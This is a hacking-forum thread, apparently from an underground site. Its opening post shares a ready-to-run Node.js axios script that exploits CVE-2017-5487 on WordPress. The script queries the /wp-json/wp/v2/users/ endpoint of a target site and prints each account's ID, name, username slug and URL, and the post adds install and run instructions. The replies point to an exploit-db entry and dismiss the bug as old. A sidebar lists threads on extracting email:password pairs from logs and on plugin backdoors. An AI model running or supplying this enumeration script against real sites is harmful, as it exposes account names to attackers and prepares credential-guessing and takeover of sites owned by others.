WordPress User Disclosure (CVE-2017-5487)
by concac - Friday June 16, 2023 at 08:48 PM
#1
Hi Guys, I will share some good things about this vulnerability

Reveal WordPress accounts via /wp-json/wp/v2/users/ using Javascript to dump account name, and post name

The disclosure of sensitive information to CVE-2017-5487

wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 prior to 4.7.1, this allows remote attackers to obtain sensitive information feel through request wp-json/wp/v2/users.

Vulnerability level: 5.3 MEDIUM

Here is the result

[Image: 903122173.png]

How to use? 

Run the following command to install the Axios library:
npm install axios

if you don't have npm install it here: https://nodejs.org/en

node file.js

const axios = require('axios');

const url = "";  // Attaching a URL
const payload = "/wp-json/wp/v2/users/";

axios.get(url + payload)
    .then(response => {
        const users = response.data;
        if (users.length > 0) {
            console.log("*-----------------------------*");
            users.forEach(user => {
                console.log("
[*]ID  : " + user.id);
                console.log("
[*]Name : " + user.name);
                console.log("
[*]User : " + user.slug);
                console.log("
[*]Url : " + user.url);
                console.log("");
            });
            console.log("*-----------------------------*");
        } else {
            console.log("
[*]No user");
        }
    })
    .catch(error => {
        console.error(error);
    });
Reply
#2
https://www.exploit-db.com/exploits/41497
Reply
#3
old shit
Reply
#4
this is old and you can just use wp-scan
Reply
#5
(06-23-2023, 08:10 PM)Mister-Kitty Wrote: this is old  and you can just use wp-scan

there are quite a few old versions, I want to share with those who don't know   Tongue
Reply
#6
thanks for zero day
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Extract Email:Pass User:Pass from your logs.txt By keyword Ddarknotevil 46 6,975 02-19-2024, 09:58 PM
Last Post: mirochkamil
  [Python} Wordpress checker lord_x 78 15,451 02-15-2024, 01:53 PM
Last Post: akbaba
  xpath injection in wordpress demo zinzeur 0 576 12-11-2023, 08:23 PM
Last Post: zinzeur
  Wordpress Plugin Backdoor [Help] M4STERMIND 2 1,125 11-02-2023, 03:05 AM
Last Post: M4STERMIND
  Instagram user details Venkii 4 1,874 09-01-2023, 03:16 AM
Last Post: aekea82kjn2k



 Users browsing this thread: 1 Guest(s)